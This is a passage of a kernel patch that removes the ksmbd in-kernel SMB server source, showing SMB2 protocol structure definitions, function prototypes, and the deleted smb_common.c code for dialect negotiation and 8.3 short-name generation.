+-	__u8   Name[8];
+-	__le32 Timeout;
+-	__le32 Flags;
+-} __packed;
+-
+-struct create_mxac_rsp {
+-	struct create_context ccontext;
+-	__u8   Name[8];
+-	__le32 QueryStatus;
+-	__le32 MaximalAccess;
+-} __packed;
+-
+-struct create_disk_id_rsp {
+-	struct create_context ccontext;
+-	__u8   Name[8];
+-	__le64 DiskFileId;
+-	__le64 VolumeId;
+-	__u8  Reserved[16];
+-} __packed;
+-
+-/* equivalent of the contents of SMB3.1.1 POSIX open context response */
+-struct create_posix_rsp {
+-	struct create_context ccontext;
+-	__u8    Name[16];
+-	__le32 nlink;
+-	__le32 reparse_tag;
+-	__le32 mode;
+-	/* SidBuffer contain two sids(Domain sid(28), UNIX group sid(16)) */
+-	u8 SidBuffer[44];
+-} __packed;
+-
+-struct smb2_buffer_desc_v1 {
+-	__le64 offset;
+-	__le32 token;
+-	__le32 length;
+-} __packed;
+-
+-#define SMB2_0_IOCTL_IS_FSCTL 0x00000001
+-
+-struct smb_sockaddr_in {
+-	__be16 Port;
+-	__be32 IPv4address;
+-	__u8 Reserved[8];
+-} __packed;
+-
+-struct smb_sockaddr_in6 {
+-	__be16 Port;
+-	__be32 FlowInfo;
+-	__u8 IPv6address[16];
+-	__be32 ScopeId;
+-} __packed;
+-
+-#define INTERNETWORK	0x0002
+-#define INTERNETWORKV6	0x0017
+-
+-struct sockaddr_storage_rsp {
+-	__le16 Family;
+-	union {
+-		struct smb_sockaddr_in addr4;
+-		struct smb_sockaddr_in6 addr6;
+-	};
+-} __packed;
+-
+-#define RSS_CAPABLE	0x00000001
+-#define RDMA_CAPABLE	0x00000002
+-
+-struct network_interface_info_ioctl_rsp {
+-	__le32 Next; /* next interface. zero if this is last one */
+-	__le32 IfIndex;
+-	__le32 Capability; /* RSS or RDMA Capable */
+-	__le32 Reserved;
+-	__le64 LinkSpeed;
+-	char	SockAddr_Storage[128];
+-} __packed;
+-
+-struct file_object_buf_type1_ioctl_rsp {
+-	__u8 ObjectId[16];
+-	__u8 BirthVolumeId[16];
+-	__u8 BirthObjectId[16];
+-	__u8 DomainId[16];
+-} __packed;
+-
+-struct resume_key_ioctl_rsp {
+-	__u64 ResumeKey[3];
+-	__le32 ContextLength;
+-	__u8 Context[4]; /* ignored, Windows sets to 4 bytes of zero */
+-} __packed;
+-
+-struct copychunk_ioctl_req {
+-	__le64 ResumeKey[3];
+-	__le32 ChunkCount;
+-	__le32 Reserved;
+-	__u8 Chunks[1]; /* array of srv_copychunk */
+-} __packed;
+-
+-struct srv_copychunk {
+-	__le64 SourceOffset;
+-	__le64 TargetOffset;
+-	__le32 Length;
+-	__le32 Reserved;
+-} __packed;
+-
+-struct copychunk_ioctl_rsp {
+-	__le32 ChunksWritten;
+-	__le32 ChunkBytesWritten;
+-	__le32 TotalBytesWritten;
+-} __packed;
+-
+-struct file_sparse {
+-	__u8	SetSparse;
+-} __packed;
+-
+-/* FILE Info response size */
+-#define FILE_DIRECTORY_INFORMATION_SIZE       1
+-#define FILE_FULL_DIRECTORY_INFORMATION_SIZE  2
+-#define FILE_BOTH_DIRECTORY_INFORMATION_SIZE  3
+-#define FILE_BASIC_INFORMATION_SIZE           40
+-#define FILE_STANDARD_INFORMATION_SIZE        24
+-#define FILE_INTERNAL_INFORMATION_SIZE        8
+-#define FILE_EA_INFORMATION_SIZE              4
+-#define FILE_ACCESS_INFORMATION_SIZE          4
+-#define FILE_NAME_INFORMATION_SIZE            9
+-#define FILE_RENAME_INFORMATION_SIZE          10
+-#define FILE_LINK_INFORMATION_SIZE            11
+-#define FILE_NAMES_INFORMATION_SIZE           12
+-#define FILE_DISPOSITION_INFORMATION_SIZE     13
+-#define FILE_POSITION_INFORMATION_SIZE        14
+-#define FILE_FULL_EA_INFORMATION_SIZE         15
+-#define FILE_MODE_INFORMATION_SIZE            4
+-#define FILE_ALIGNMENT_INFORMATION_SIZE       4
+-#define FILE_ALL_INFORMATION_SIZE             104
+-#define FILE_ALLOCATION_INFORMATION_SIZE      19
+-#define FILE_END_OF_FILE_INFORMATION_SIZE     20
+-#define FILE_ALTERNATE_NAME_INFORMATION_SIZE  8
+-#define FILE_STREAM_INFORMATION_SIZE          32
+-#define FILE_PIPE_INFORMATION_SIZE            23
+-#define FILE_PIPE_LOCAL_INFORMATION_SIZE      24
+-#define FILE_PIPE_REMOTE_INFORMATION_SIZE     25
+-#define FILE_MAILSLOT_QUERY_INFORMATION_SIZE  26
+-#define FILE_MAILSLOT_SET_INFORMATION_SIZE    27
+-#define FILE_COMPRESSION_INFORMATION_SIZE     16
+-#define FILE_OBJECT_ID_INFORMATION_SIZE       29
+-/* Number 30 not defined in documents */
+-#define FILE_MOVE_CLUSTER_INFORMATION_SIZE    31
+-#define FILE_QUOTA_INFORMATION_SIZE           32
+-#define FILE_REPARSE_POINT_INFORMATION_SIZE   33
+-#define FILE_NETWORK_OPEN_INFORMATION_SIZE    56
+-#define FILE_ATTRIBUTE_TAG_INFORMATION_SIZE   8
+-
+-/* FS Info response  size */
+-#define FS_DEVICE_INFORMATION_SIZE     8
+-#define FS_ATTRIBUTE_INFORMATION_SIZE  16
+-#define FS_VOLUME_INFORMATION_SIZE     24
+-#define FS_SIZE_INFORMATION_SIZE       24
+-#define FS_FULL_SIZE_INFORMATION_SIZE  32
+-#define FS_SECTOR_SIZE_INFORMATION_SIZE 28
+-#define FS_OBJECT_ID_INFORMATION_SIZE 64
+-#define FS_CONTROL_INFORMATION_SIZE 48
+-#define FS_POSIX_INFORMATION_SIZE 56
+-
+-/* FS_ATTRIBUTE_File_System_Name */
+-#define FS_TYPE_SUPPORT_SIZE   44
+-struct fs_type_info {
+-	char		*fs_name;
+-	long		magic_number;
+-} __packed;
+-
+-/*
+- *	PDU query infolevel structure definitions
+- *	BB consider moving to a different header
+- */
+-
+-struct smb2_file_access_info {
+-	__le32 AccessFlags;
+-} __packed;
+-
+-struct smb2_file_alignment_info {
+-	__le32 AlignmentRequirement;
+-} __packed;
+-
+-struct smb2_file_basic_info { /* data block encoding of response to level 18 */
+-	__le64 CreationTime;	/* Beginning of FILE_BASIC_INFO equivalent */
+-	__le64 LastAccessTime;
+-	__le64 LastWriteTime;
+-	__le64 ChangeTime;
+-	__le32 Attributes;
+-	__u32  Pad1;		/* End of FILE_BASIC_INFO_INFO equivalent */
+-} __packed;
+-
+-struct smb2_file_alt_name_info {
+-	__le32 FileNameLength;
+-	char FileName[];
+-} __packed;
+-
+-struct smb2_file_stream_info {
+-	__le32  NextEntryOffset;
+-	__le32  StreamNameLength;
+-	__le64 StreamSize;
+-	__le64 StreamAllocationSize;
+-	char   StreamName[];
+-} __packed;
+-
+-struct smb2_file_ntwrk_info {
+-	__le64 CreationTime;
+-	__le64 LastAccessTime;
+-	__le64 LastWriteTime;
+-	__le64 ChangeTime;
+-	__le64 AllocationSize;
+-	__le64 EndOfFile;
+-	__le32 Attributes;
+-	__le32 Reserved;
+-} __packed;
+-
+-struct smb2_file_standard_info {
+-	__le64 AllocationSize;
+-	__le64 EndOfFile;
+-	__le32 NumberOfLinks;	/* hard links */
+-	__u8   DeletePending;
+-	__u8   Directory;
+-	__le16 Reserved;
+-} __packed; /* level 18 Query */
+-
+-struct smb2_file_ea_info {
+-	__le32 EASize;
+-} __packed;
+-
+-struct smb2_file_alloc_info {
+-	__le64 AllocationSize;
+-} __packed;
+-
+-struct smb2_file_disposition_info {
+-	__u8 DeletePending;
+-} __packed;
+-
+-struct smb2_file_pos_info {
+-	__le64 CurrentByteOffset;
+-} __packed;
+-
+-#define FILE_MODE_INFO_MASK cpu_to_le32(0x0000100e)
+-
+-struct smb2_file_mode_info {
+-	__le32 Mode;
+-} __packed;
+-
+-#define COMPRESSION_FORMAT_NONE 0x0000
+-#define COMPRESSION_FORMAT_LZNT1 0x0002
+-
+-struct smb2_file_comp_info {
+-	__le64 CompressedFileSize;
+-	__le16 CompressionFormat;
+-	__u8 CompressionUnitShift;
+-	__u8 ChunkShift;
+-	__u8 ClusterShift;
+-	__u8 Reserved[3];
+-} __packed;
+-
+-struct smb2_file_attr_tag_info {
+-	__le32 FileAttributes;
+-	__le32 ReparseTag;
+-} __packed;
+-
+-#define SL_RESTART_SCAN	0x00000001
+-#define SL_RETURN_SINGLE_ENTRY	0x00000002
+-#define SL_INDEX_SPECIFIED	0x00000004
+-
+-struct smb2_ea_info_req {
+-	__le32 NextEntryOffset;
+-	__u8   EaNameLength;
+-	char name[1];
+-} __packed; /* level 15 Query */
+-
+-struct smb2_ea_info {
+-	__le32 NextEntryOffset;
+-	__u8   Flags;
+-	__u8   EaNameLength;
+-	__le16 EaValueLength;
+-	char name[1];
+-	/* optionally followed by value */
+-} __packed; /* level 15 Query */
+-
+-struct create_ea_buf_req {
+-	struct create_context ccontext;
+-	__u8   Name[8];
+-	struct smb2_ea_info ea;
+-} __packed;
+-
+-struct create_sd_buf_req {
+-	struct create_context ccontext;
+-	__u8   Name[8];
+-	struct smb_ntsd ntsd;
+-} __packed;
+-
+-struct smb2_posix_info {
+-	__le32 NextEntryOffset;
+-	__u32 Ignored;
+-	__le64 CreationTime;
+-	__le64 LastAccessTime;
+-	__le64 LastWriteTime;
+-	__le64 ChangeTime;
+-	__le64 EndOfFile;
+-	__le64 AllocationSize;
+-	__le32 DosAttributes;
+-	__le64 Inode;
+-	__le32 DeviceId;
+-	__le32 Zero;
+-	/* beginning of POSIX Create Context Response */
+-	__le32 HardLinks;
+-	__le32 ReparseTag;
+-	__le32 Mode;
+-	/* SidBuffer contain two sids (UNIX user sid(16), UNIX group sid(16)) */
+-	u8 SidBuffer[32];
+-	__le32 name_len;
+-	u8 name[1];
+-	/*
+-	 * var sized owner SID
+-	 * var sized group SID
+-	 * le32 filenamelength
+-	 * u8  filename[]
+-	 */
+-} __packed;
+-
+-/* functions */
+-void init_smb2_1_server(struct ksmbd_conn *conn);
+-void init_smb3_0_server(struct ksmbd_conn *conn);
+-void init_smb3_02_server(struct ksmbd_conn *conn);
+-int init_smb3_11_server(struct ksmbd_conn *conn);
+-
+-void init_smb2_max_read_size(unsigned int sz);
+-void init_smb2_max_write_size(unsigned int sz);
+-void init_smb2_max_trans_size(unsigned int sz);
+-void init_smb2_max_credits(unsigned int sz);
+-
+-bool is_smb2_neg_cmd(struct ksmbd_work *work);
+-bool is_smb2_rsp(struct ksmbd_work *work);
+-
+-u16 get_smb2_cmd_val(struct ksmbd_work *work);
+-void set_smb2_rsp_status(struct ksmbd_work *work, __le32 err);
+-int init_smb2_rsp_hdr(struct ksmbd_work *work);
+-int smb2_allocate_rsp_buf(struct ksmbd_work *work);
+-bool is_chained_smb2_message(struct ksmbd_work *work);
+-int init_smb2_neg_rsp(struct ksmbd_work *work);
+-void smb2_set_err_rsp(struct ksmbd_work *work);
+-int smb2_check_user_session(struct ksmbd_work *work);
+-int smb2_get_ksmbd_tcon(struct ksmbd_work *work);
+-bool smb2_is_sign_req(struct ksmbd_work *work, unsigned int command);
+-int smb2_check_sign_req(struct ksmbd_work *work);
+-void smb2_set_sign_rsp(struct ksmbd_work *work);
+-int smb3_check_sign_req(struct ksmbd_work *work);
+-void smb3_set_sign_rsp(struct ksmbd_work *work);
+-int find_matching_smb2_dialect(int start_index, __le16 *cli_dialects,
+-			       __le16 dialects_count);
+-struct file_lock *smb_flock_init(struct file *f);
+-int setup_async_work(struct ksmbd_work *work, void (*fn)(void **),
+-		     void **arg);
+-void smb2_send_interim_resp(struct ksmbd_work *work, __le32 status);
+-struct channel *lookup_chann_list(struct ksmbd_session *sess,
+-				  struct ksmbd_conn *conn);
+-void smb3_preauth_hash_rsp(struct ksmbd_work *work);
+-bool smb3_is_transform_hdr(void *buf);
+-int smb3_decrypt_req(struct ksmbd_work *work);
+-int smb3_encrypt_resp(struct ksmbd_work *work);
+-bool smb3_11_final_sess_setup_resp(struct ksmbd_work *work);
+-int smb2_set_rsp_credits(struct ksmbd_work *work);
+-bool smb3_encryption_negotiated(struct ksmbd_conn *conn);
+-
+-/* smb2 misc functions */
+-int ksmbd_smb2_check_message(struct ksmbd_work *work);
+-
+-/* smb2 command handlers */
+-int smb2_handle_negotiate(struct ksmbd_work *work);
+-int smb2_negotiate_request(struct ksmbd_work *work);
+-int smb2_sess_setup(struct ksmbd_work *work);
+-int smb2_tree_connect(struct ksmbd_work *work);
+-int smb2_tree_disconnect(struct ksmbd_work *work);
+-int smb2_session_logoff(struct ksmbd_work *work);
+-int smb2_open(struct ksmbd_work *work);
+-int smb2_query_info(struct ksmbd_work *work);
+-int smb2_query_dir(struct ksmbd_work *work);
+-int smb2_close(struct ksmbd_work *work);
+-int smb2_echo(struct ksmbd_work *work);
+-int smb2_set_info(struct ksmbd_work *work);
+-int smb2_read(struct ksmbd_work *work);
+-int smb2_write(struct ksmbd_work *work);
+-int smb2_flush(struct ksmbd_work *work);
+-int smb2_cancel(struct ksmbd_work *work);
+-int smb2_lock(struct ksmbd_work *work);
+-int smb2_ioctl(struct ksmbd_work *work);
+-int smb2_oplock_break(struct ksmbd_work *work);
+-int smb2_notify(struct ksmbd_work *ksmbd_work);
+-
+-/*
+- * Get the body of the smb2 message excluding the 4 byte rfc1002 headers
+- * from request/response buffer.
+- */
+-static inline void *smb2_get_msg(void *buf)
+-{
+-	return buf + 4;
+-}
+-
+-#endif	/* _SMB2PDU_H */
+diff --git a/fs/ksmbd/smb_common.c b/fs/ksmbd/smb_common.c
+deleted file mode 100644
+index 05d7f3e910bf4..0000000000000
+--- a/fs/ksmbd/smb_common.c
++++ /dev/null
+@@ -1,797 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
+- *   Copyright (C) 2018 Namjae Jeon <linkinjeon@kernel.org>
+- */
+-
+-#include <linux/user_namespace.h>
+-
+-#include "smb_common.h"
+-#include "server.h"
+-#include "misc.h"
+-#include "smbstatus.h"
+-#include "connection.h"
+-#include "ksmbd_work.h"
+-#include "mgmt/user_session.h"
+-#include "mgmt/user_config.h"
+-#include "mgmt/tree_connect.h"
+-#include "mgmt/share_config.h"
+-
+-/*for shortname implementation */
+-static const char basechars[43] = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ_-!@#$%";
+-#define MANGLE_BASE (sizeof(basechars) / sizeof(char) - 1)
+-#define MAGIC_CHAR '~'
+-#define PERIOD '.'
+-#define mangle(V) ((char)(basechars[(V) % MANGLE_BASE]))
+-
+-struct smb_protocol {
+-	int		index;
+-	char		*name;
+-	char		*prot;
+-	__u16		prot_id;
+-};
+-
+-static struct smb_protocol smb1_protos[] = {
+-	{
+-		SMB21_PROT,
+-		"\2SMB 2.1",
+-		"SMB2_10",
+-		SMB21_PROT_ID
+-	},
+-	{
+-		SMB2X_PROT,
+-		"\2SMB 2.???",
+-		"SMB2_22",
+-		SMB2X_PROT_ID
+-	},
+-};
+-
+-static struct smb_protocol smb2_protos[] = {
+-	{
+-		SMB21_PROT,
+-		"\2SMB 2.1",
+-		"SMB2_10",
+-		SMB21_PROT_ID
+-	},
+-	{
+-		SMB30_PROT,
+-		"\2SMB 3.0",
+-		"SMB3_00",
+-		SMB30_PROT_ID
+-	},
+-	{
+-		SMB302_PROT,
+-		"\2SMB 3.02",
+-		"SMB3_02",
+-		SMB302_PROT_ID
+-	},
+-	{
+-		SMB311_PROT,
+-		"\2SMB 3.1.1",
+-		"SMB3_11",
+-		SMB311_PROT_ID
+-	},
+-};
+-
+-unsigned int ksmbd_server_side_copy_max_chunk_count(void)
+-{
+-	return 256;
+-}
+-
+-unsigned int ksmbd_server_side_copy_max_chunk_size(void)
+-{
+-	return (2U << 30) - 1;
+-}
+-
+-unsigned int ksmbd_server_side_copy_max_total_size(void)
+-{
+-	return (2U << 30) - 1;
+-}
+-
+-inline int ksmbd_min_protocol(void)
+-{
+-	return SMB21_PROT;
+-}
+-
+-inline int ksmbd_max_protocol(void)
+-{
+-	return SMB311_PROT;
+-}
+-
+-int ksmbd_lookup_protocol_idx(char *str)
+-{
+-	int offt = ARRAY_SIZE(smb1_protos) - 1;
+-	int len = strlen(str);
+-
+-	while (offt >= 0) {
+-		if (!strncmp(str, smb1_protos[offt].prot, len)) {
+-			ksmbd_debug(SMB, "selected %s dialect idx = %d\n",
+-				    smb1_protos[offt].prot, offt);
+-			return smb1_protos[offt].index;
+-		}
+-		offt--;
+-	}
+-
+-	offt = ARRAY_SIZE(smb2_protos) - 1;
+-	while (offt >= 0) {
+-		if (!strncmp(str, smb2_protos[offt].prot, len)) {
+-			ksmbd_debug(SMB, "selected %s dialect idx = %d\n",
+-				    smb2_protos[offt].prot, offt);
+-			return smb2_protos[offt].index;
+-		}
+-		offt--;
+-	}
+-	return -1;
+-}
+-
+-/**
+- * ksmbd_verify_smb_message() - check for valid smb2 request header
+- * @work:	smb work
+- *
+- * check for valid smb signature and packet direction(request/response)
+- *
+- * Return:      0 on success, otherwise -EINVAL
+- */
+-int ksmbd_verify_smb_message(struct ksmbd_work *work)
+-{
+-	struct smb2_hdr *smb2_hdr = ksmbd_req_buf_next(work);
+-	struct smb_hdr *hdr;
+-
+-	if (smb2_hdr->ProtocolId == SMB2_PROTO_NUMBER)
+-		return ksmbd_smb2_check_message(work);
+-
+-	hdr = work->request_buf;
+-	if (*(__le32 *)hdr->Protocol == SMB1_PROTO_NUMBER &&
+-	    hdr->Command == SMB_COM_NEGOTIATE) {
+-		work->conn->outstanding_credits++;
+-		return 0;
+-	}
+-
+-	return -EINVAL;
+-}
+-
+-/**
+- * ksmbd_smb_request() - check for valid smb request type
+- * @conn:	connection instance
+- *
+- * Return:      true on success, otherwise false
+- */
+-bool ksmbd_smb_request(struct ksmbd_conn *conn)
+-{
+-	__le32 *proto = (__le32 *)smb2_get_msg(conn->request_buf);
+-
+-	if (*proto == SMB2_COMPRESSION_TRANSFORM_ID) {
+-		pr_err_ratelimited("smb2 compression not support yet");
+-		return false;
+-	}
+-
+-	if (*proto != SMB1_PROTO_NUMBER &&
+-	    *proto != SMB2_PROTO_NUMBER &&
+-	    *proto != SMB2_TRANSFORM_PROTO_NUM)
+-		return false;
+-
+-	return true;
+-}
+-
+-static bool supported_protocol(int idx)
+-{
+-	if (idx == SMB2X_PROT &&
+-	    (server_conf.min_protocol >= SMB21_PROT ||
+-	     server_conf.max_protocol <= SMB311_PROT))
+-		return true;
+-
+-	return (server_conf.min_protocol <= idx &&
+-		idx <= server_conf.max_protocol);
+-}
+-
+-static char *next_dialect(char *dialect, int *next_off, int bcount)
+-{
+-	dialect = dialect + *next_off;
+-	*next_off = strnlen(dialect, bcount);
+-	if (dialect[*next_off] != '\0')
+-		return NULL;
+-	return dialect;
+-}
+-
+-static int ksmbd_lookup_dialect_by_name(char *cli_dialects, __le16 byte_count)
+-{
+-	int i, seq_num, bcount, next;
+-	char *dialect;
+-
+-	for (i = ARRAY_SIZE(smb1_protos) - 1; i >= 0; i--) {
+-		seq_num = 0;
+-		next = 0;
+-		dialect = cli_dialects;
+-		bcount = le16_to_cpu(byte_count);
+-		do {
+-			dialect = next_dialect(dialect, &next, bcount);
+-			if (!dialect)
+-				break;
+-			ksmbd_debug(SMB, "client requested dialect %s\n",
+-				    dialect);
+-			if (!strcmp(dialect, smb1_protos[i].name)) {
+-				if (supported_protocol(smb1_protos[i].index)) {
+-					ksmbd_debug(SMB,
+-						    "selected %s dialect\n",
+-						    smb1_protos[i].name);
+-					if (smb1_protos[i].index == SMB1_PROT)
+-						return seq_num;
+-					return smb1_protos[i].prot_id;
+-				}
+-			}
+-			seq_num++;
+-			bcount -= (++next);
+-		} while (bcount > 0);
+-	}
+-
+-	return BAD_PROT_ID;
+-}
+-
+-int ksmbd_lookup_dialect_by_id(__le16 *cli_dialects, __le16 dialects_count)
+-{
+-	int i;
+-	int count;
+-
+-	for (i = ARRAY_SIZE(smb2_protos) - 1; i >= 0; i--) {
+-		count = le16_to_cpu(dialects_count);
+-		while (--count >= 0) {
+-			ksmbd_debug(SMB, "client requested dialect 0x%x\n",
+-				    le16_to_cpu(cli_dialects[count]));
+-			if (le16_to_cpu(cli_dialects[count]) !=
+-					smb2_protos[i].prot_id)
+-				continue;
+-
+-			if (supported_protocol(smb2_protos[i].index)) {
+-				ksmbd_debug(SMB, "selected %s dialect\n",
+-					    smb2_protos[i].name);
+-				return smb2_protos[i].prot_id;
+-			}
+-		}
+-	}
+-
+-	return BAD_PROT_ID;
+-}
+-
+-static int ksmbd_negotiate_smb_dialect(void *buf)
+-{
+-	int smb_buf_length = get_rfc1002_len(buf);
+-	__le32 proto = ((struct smb2_hdr *)smb2_get_msg(buf))->ProtocolId;
+-
+-	if (proto == SMB2_PROTO_NUMBER) {
+-		struct smb2_negotiate_req *req;
+-		int smb2_neg_size =
+-			offsetof(struct smb2_negotiate_req, Dialects);
+-
+-		req = (struct smb2_negotiate_req *)smb2_get_msg(buf);
+-		if (smb2_neg_size > smb_buf_length)
+-			goto err_out;
+-
+-		if (smb2_neg_size + le16_to_cpu(req->DialectCount) * sizeof(__le16) >
+-		    smb_buf_length)
+-			goto err_out;
+-
+-		return ksmbd_lookup_dialect_by_id(req->Dialects,
+-						  req->DialectCount);
+-	}
+-
+-	proto = *(__le32 *)((struct smb_hdr *)buf)->Protocol;
+-	if (proto == SMB1_PROTO_NUMBER) {
+-		struct smb_negotiate_req *req;
+-
+-		req = (struct smb_negotiate_req *)buf;
+-		if (le16_to_cpu(req->ByteCount) < 2)
+-			goto err_out;
+-
+-		if (offsetof(struct smb_negotiate_req, DialectsArray) - 4 +
+-			le16_to_cpu(req->ByteCount) > smb_buf_length) {
+-			goto err_out;
+-		}
+-
+-		return ksmbd_lookup_dialect_by_name(req->DialectsArray,
+-						    req->ByteCount);
+-	}
+-
+-err_out:
+-	return BAD_PROT_ID;
+-}
+-
+-#define SMB_COM_NEGOTIATE_EX	0x0
+-
+-/**
+- * get_smb1_cmd_val() - get smb command value from smb header
+- * @work:	smb work containing smb header
+- *
+- * Return:      smb command value
+- */
+-static u16 get_smb1_cmd_val(struct ksmbd_work *work)
+-{
+-	return SMB_COM_NEGOTIATE_EX;
+-}
+-
+-/**
+- * init_smb1_rsp_hdr() - initialize smb negotiate response header
+- * @work:	smb work containing smb request
+- *
+- * Return:      0 on success, otherwise -EINVAL
+- */
+-static int init_smb1_rsp_hdr(struct ksmbd_work *work)
+-{
+-	struct smb_hdr *rsp_hdr = (struct smb_hdr *)work->response_buf;
+-	struct smb_hdr *rcv_hdr = (struct smb_hdr *)work->request_buf;
+-
+-	/*
+-	 * Remove 4 byte direct TCP header.
+-	 */
+-	*(__be32 *)work->response_buf =
+-		cpu_to_be32(sizeof(struct smb_hdr) - 4);
+-
+-	rsp_hdr->Command = SMB_COM_NEGOTIATE;
+-	*(__le32 *)rsp_hdr->Protocol = SMB1_PROTO_NUMBER;
+-	rsp_hdr->Flags = SMBFLG_RESPONSE;
+-	rsp_hdr->Flags2 = SMBFLG2_UNICODE | SMBFLG2_ERR_STATUS |
+-		SMBFLG2_EXT_SEC | SMBFLG2_IS_LONG_NAME;
+-	rsp_hdr->Pid = rcv_hdr->Pid;
+-	rsp_hdr->Mid = rcv_hdr->Mid;
+-	return 0;
+-}
+-
+-/**
+- * smb1_check_user_session() - check for valid session for a user
+- * @work:	smb work containing smb request buffer
+- *
+- * Return:      0 on success, otherwise error
+- */
+-static int smb1_check_user_session(struct ksmbd_work *work)
+-{
+-	unsigned int cmd = work->conn->ops->get_cmd_val(work);
+-
+-	if (cmd == SMB_COM_NEGOTIATE_EX)
+-		return 0;
+-
+-	return -EINVAL;
+-}
+-
+-/**
+- * smb1_allocate_rsp_buf() - allocate response buffer for a command
+- * @work:	smb work containing smb request
+- *
+- * Return:      0 on success, otherwise -ENOMEM
+- */
+-static int smb1_allocate_rsp_buf(struct ksmbd_work *work)
+-{
+-	work->response_buf = kmalloc(MAX_CIFS_SMALL_BUFFER_SIZE,
+-			GFP_KERNEL | __GFP_ZERO);
+-	work->response_sz = MAX_CIFS_SMALL_BUFFER_SIZE;
+-
+-	if (!work->response_buf) {
+-		pr_err("Failed to allocate %u bytes buffer\n",
+-				MAX_CIFS_SMALL_BUFFER_SIZE);
+-		return -ENOMEM;
+-	}
+-
+-	return 0;
+-}
+-
+-static struct smb_version_ops smb1_server_ops = {
+-	.get_cmd_val = get_smb1_cmd_val,
+-	.init_rsp_hdr = init_smb1_rsp_hdr,
+-	.allocate_rsp_buf = smb1_allocate_rsp_buf,
+-	.check_user_session = smb1_check_user_session,
+-};
+-
+-static int smb1_negotiate(struct ksmbd_work *work)
+-{
+-	return ksmbd_smb_negotiate_common(work, SMB_COM_NEGOTIATE);
+-}
+-
+-static struct smb_version_cmds smb1_server_cmds[1] = {
+-	[SMB_COM_NEGOTIATE_EX]	= { .proc = smb1_negotiate, },
+-};
+-
+-static void init_smb1_server(struct ksmbd_conn *conn)
+-{
+-	conn->ops = &smb1_server_ops;
+-	conn->cmds = smb1_server_cmds;
+-	conn->max_cmds = ARRAY_SIZE(smb1_server_cmds);
+-}
+-
+-void ksmbd_init_smb_server(struct ksmbd_work *work)
+-{
+-	struct ksmbd_conn *conn = work->conn;
+-	__le32 proto;
+-
+-	if (conn->need_neg == false)
+-		return;
+-
+-	proto = *(__le32 *)((struct smb_hdr *)work->request_buf)->Protocol;
+-	if (proto == SMB1_PROTO_NUMBER)
+-		init_smb1_server(conn);
+-	else
+-		init_smb3_11_server(conn);
+-}
+-
+-int ksmbd_populate_dot_dotdot_entries(struct ksmbd_work *work, int info_level,
+-				      struct ksmbd_file *dir,
+-				      struct ksmbd_dir_info *d_info,
+-				      char *search_pattern,
+-				      int (*fn)(struct ksmbd_conn *, int,
+-						struct ksmbd_dir_info *,
+-						struct ksmbd_kstat *))
+-{
+-	int i, rc = 0;
+-	struct ksmbd_conn *conn = work->conn;
+-	struct user_namespace *user_ns = file_mnt_user_ns(dir->filp);
+-
+-	for (i = 0; i < 2; i++) {
+-		struct kstat kstat;
+-		struct ksmbd_kstat ksmbd_kstat;
+-		struct dentry *dentry;
+-
+-		if (!dir->dot_dotdot[i]) { /* fill dot entry info */
+-			if (i == 0) {
+-				d_info->name = ".";
+-				d_info->name_len = 1;
+-				dentry = dir->filp->f_path.dentry;
+-			} else {
+-				d_info->name = "..";
+-				d_info->name_len = 2;
+-				dentry = dir->filp->f_path.dentry->d_parent;
+-			}
+-
+-			if (!match_pattern(d_info->name, d_info->name_len,
+-					   search_pattern)) {
+-				dir->dot_dotdot[i] = 1;
+-				continue;
+-			}
+-
+-			ksmbd_kstat.kstat = &kstat;
+-			ksmbd_vfs_fill_dentry_attrs(work,
+-						    user_ns,
+-						    dentry,
+-						    &ksmbd_kstat);
+-			rc = fn(conn, info_level, d_info, &ksmbd_kstat);
+-			if (rc)
+-				break;
+-			if (d_info->out_buf_len <= 0)
+-				break;
+-
+-			dir->dot_dotdot[i] = 1;
+-			if (d_info->flags & SMB2_RETURN_SINGLE_ENTRY) {
+-				d_info->out_buf_len = 0;
+-				break;
+-			}
+-		}
+-	}
+-
+-	return rc;
+-}
+-
+-/**
+- * ksmbd_extract_shortname() - get shortname from long filename
+- * @conn:	connection instance
+- * @longname:	source long filename
+- * @shortname:	destination short filename
+- *
+- * Return:	shortname length or 0 when source long name is '.' or '..'
+- * TODO: Though this function comforms the restriction of 8.3 Filename spec,
+- * but the result is different with Windows 7's one. need to check.
+- */
+-int ksmbd_extract_shortname(struct ksmbd_conn *conn, const char *longname,
+-			    char *shortname)
+-{
+-	const char *p;
+-	char base[9], extension[4];
+-	char out[13] = {0};
+-	int baselen = 0;
+-	int extlen = 0, len = 0;
+-	unsigned int csum = 0;
+-	const unsigned char *ptr;
+-	bool dot_present = true;
+-
+-	p = longname;
+-	if ((*p == '.') || (!(strcmp(p, "..")))) {
+-		/*no mangling required */
+-		return 0;
+-	}
+-
+-	p = strrchr(longname, '.');
+-	if (p == longname) { /*name starts with a dot*/
+-		strscpy(extension, "___", strlen("___"));
+-	} else {
+-		if (p) {
+-			p++;
+-			while (*p && extlen < 3) {
+-				if (*p != '.')
+-					extension[extlen++] = toupper(*p);
+-				p++;
+-			}
+-			extension[extlen] = '\0';
+-		} else {
+-			dot_present = false;
+-		}
+-	}
+-
+-	p = longname;
+-	if (*p == '.') {
+-		p++;
+-		longname++;
+-	}
+-	while (*p && (baselen < 5)) {
+-		if (*p != '.')
+-			base[baselen++] = toupper(*p);
+-		p++;
+-	}
+-
+-	base[baselen] = MAGIC_CHAR;
+-	memcpy(out, base, baselen + 1);
+-
+-	ptr = longname;
+-	len = strlen(longname);
+-	for (; len > 0; len--, ptr++)
+-		csum += *ptr;
+-
+-	csum = csum % (MANGLE_BASE * MANGLE_BASE);
+-	out[baselen + 1] = mangle(csum / MANGLE_BASE);
+-	out[baselen + 2] = mangle(csum);
+-	out[baselen + 3] = PERIOD;
+-
+-	if (dot_present)
+-		memcpy(&out[baselen + 4], extension, 4);
+-	else
+-		out[baselen + 4] = '\0';
+-	smbConvertToUTF16((__le16 *)shortname, out, PATH_MAX,
+-			  conn->local_nls, 0);
+-	len = strlen(out) * 2;
+-	return len;
+-}
+-
+-static int __smb2_negotiate(struct ksmbd_conn *conn)
+-{
+-	return (conn->dialect >= SMB20_PROT_ID &&
+-		conn->dialect <= SMB311_PROT_ID);
+-}
+-
+-static int smb_handle_negotiate(struct ksmbd_work *work)
+-{
+-	struct smb_negotiate_rsp *neg_rsp = work->response_buf;
+-
+-	ksmbd_debug(SMB, "Unsupported SMB1 protocol\n");
+-
+-	/* Add 2 byte bcc and 2 byte DialectIndex. */
+-	inc_rfc1001_len(work->response_buf, 4);
+-	neg_rsp->hdr.Status.CifsError = STATUS_SUCCESS;
